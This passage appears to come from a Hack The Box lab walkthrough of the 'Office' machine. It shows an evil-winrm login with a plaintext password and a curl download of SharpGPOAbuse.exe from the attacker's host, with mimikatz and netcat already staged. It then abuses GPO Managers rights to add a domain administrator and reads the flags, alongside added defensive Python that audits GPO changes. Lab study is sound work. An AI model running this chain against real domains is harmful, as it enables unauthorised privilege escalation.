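    salt=bytes.fromhex("649c4466d5d647dd2c595f4e43fb7e1d"),
    hmac2_key=bytes.fromhex("32e88dfd1927fdef0ede5abf2c024e3a"),
    data=bytes(range(192)), sign=bytes(range(20)),
)

if __name__ == "__main__":
    info = parse_dpapi_blob(SAMPLE_BLOB)
    print(info["master_key_guid"], "->",
          master_key_path("C:\\Users\\PPotts", "S-1-5-21-1199398058-4196589450-691661856-1107", info["master_key_guid"]))
```

From the defender's side the same walk is useful in reverse: an inventory of which master key GUIDs the credential files on a host reference tells you which master keys (and, through the domain backup key used by the /rpc step above, which DC secrets) would have to be protected or rotated after a compromise.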
With those credentials we connect over WinRM.
┌──(root㉿kali)-[~/htb/Box/Office]
└─# evil-winrm -i 10.10.11.3 -u hhogan -p 'H4ppyFtW183#'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami
office\hhogan
*Evil-WinRM* PS C:\Users\HHogan\Documents>
This user belongs to the GPO Managers group.
*Evil-WinRM* PS C:\Users\HHogan\Documents> net user hhogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.
SharpGPOAbuse - Abuse GPO
We can abuse this group with the SharpGPOAbuse tool.
*Evil-WinRM* PS C:\temp> curl 10.10.14.132/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
*Evil-WinRM* PS C:\temp> dir
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 8:55 PM 1250056 mimikatz.exe
-a---- 6/7/2024 7:53 PM 45272 nc.exe
-a---- 6/7/2024 9:28 PM 80896 SharpGPOAbuse.exe
We modify the Default Domain Policy to add HHogan as a local administrator.
*Evil-WinRM* PS C:\temp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
We refresh the policies.
*Evil-WinRM* PS C:\temp> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Now we are administrators.
*Evil-WinRM* PS C:\temp> net user hhogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.
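To close from the defender's side, an added Python example (not from the write-up or from SharpGPOAbuse) that audits what that GPO edit leaves behind in SYSVOL: it decodes GptTmpl.inf (normally UTF-16 with a BOM), expands the [Group Membership] section into (group, member) pairs and reports any principal newly pushed into BUILTIN\Administrators (S-1-5-32-544) compared with a baseline copy, plus the Version counter from GPT.ini, which the tool output above says it increased. The fixture is constructed; the member SID is the HHogan SID printed above.

```python
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def decode_inf(raw: bytes) -> str:
    """GptTmpl.inf is normally UTF-16 with a BOM; fall back to UTF-8 for hand-written files."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")  # consumes the BOM
    return raw.decode("utf-8", "replace")


def parse_inf(text: str) -> dict:
    """Minimal INI reader: {section: [(key, value), ...]}, keeping duplicate keys in order."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current].append((key.strip(), value.strip()))
    return sections


def _sids(value: str) -> list:
    """Members are comma-separated and SIDs carry a leading '*'."""
    return [item.strip().lstrip("*") for item in value.split(",") if item.strip()]


def restricted_group_pairs(text: str) -> list:
    """Expand [Group Membership] into (group, member) pairs from both key forms."""
    pairs = []
    for key, value in parse_inf(text).get("Group Membership", []):
        if "__" not in key:
            continue
        subject, relation = key.rsplit("__", 1)
        subject = subject.lstrip("*")
        for sid in _sids(value):
            if relation == "Members":      # <group>__Members = <member>[,...]
                pairs.append((subject, sid))
            elif relation == "Memberof":   # <member>__Memberof = <group>[,...]
                pairs.append((sid, subject))
    return pairs


def new_local_admins(current: str, baseline: str = "") -> list:
    """Principals a GPO now pushes into BUILTIN\\Administrators that the baseline did not."""
    known = set(restricted_group_pairs(baseline))
    return sorted(member for group, member in restricted_group_pairs(current)
                  if group == BUILTIN_ADMINISTRATORS and (group, member) not in known)


def gpt_version(gpt_ini: str) -> int:
    """Version counter from GPT.ini [General]; a jump without a change record is itself a signal."""
    for key, value in parse_inf(gpt_ini).get("General", []):
        if key.lower() == "version":
            return int(value)
    raise ValueError("no Version in GPT.ini")


# Constructed fixture mirroring what a Restricted Groups edit of the Default Domain Policy
# leaves in SYSVOL; encode("utf-16") writes the BOM the real file carries.
SAMPLE_GPTTMPL = (
    "[Unicode]\r\nUnicode=yes\r\n"
    "[Version]\r\nsignature=\"$CHICAGO$\"\r\nRevision=1\r\n"
    "[Group Membership]\r\n"
    "*S-1-5-32-544__Memberof =\r\n"
    "*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108\r\n"
).encode("utf-16")

SAMPLE_GPT_INI_BEFORE = "[General]\r\nVersion=1\r\ndisplayName=Default Domain Policy\r\n"
SAMPLE_GPT_INI_AFTER = "[General]\r\nVersion=2\r\ndisplayName=Default Domain Policy\r\n"

if __name__ == "__main__":
    text = decode_inf(SAMPLE_GPTTMPL)
    print("new local admins:", new_local_admins(text))
    print("GPT.ini version delta:", gpt_version(SAMPLE_GPT_INI_AFTER) - gpt_version(SAMPLE_GPT_INI_BEFORE))
```

Running this over a copy of \\<domain>\SysVol\<domain>\Policies\<GUID>\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf against a known-good baseline catches the change before the next refresh cycle applies it; with directory object auditing enabled, the versionNumber update on the GPO object also surfaces as event 5136 on the domain controller, and membership of a group such as GPO Managers deserves the same review as Domain Admins.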
We close the session and reconnect to obtain the flags.
*Evil-WinRM* PS C:\users\Administrator\desktop> type root.txt
ec424b2bbacea5d3aa115ad4438a84f3
*Evil-WinRM* PS C:\users\Administrator\desktop> type c:\users\tstark\desktop\user.txt
d05e09504294d1337a0824ef8bef2898
*Evil-WinRM* PS C:\users\Administrator\desktop>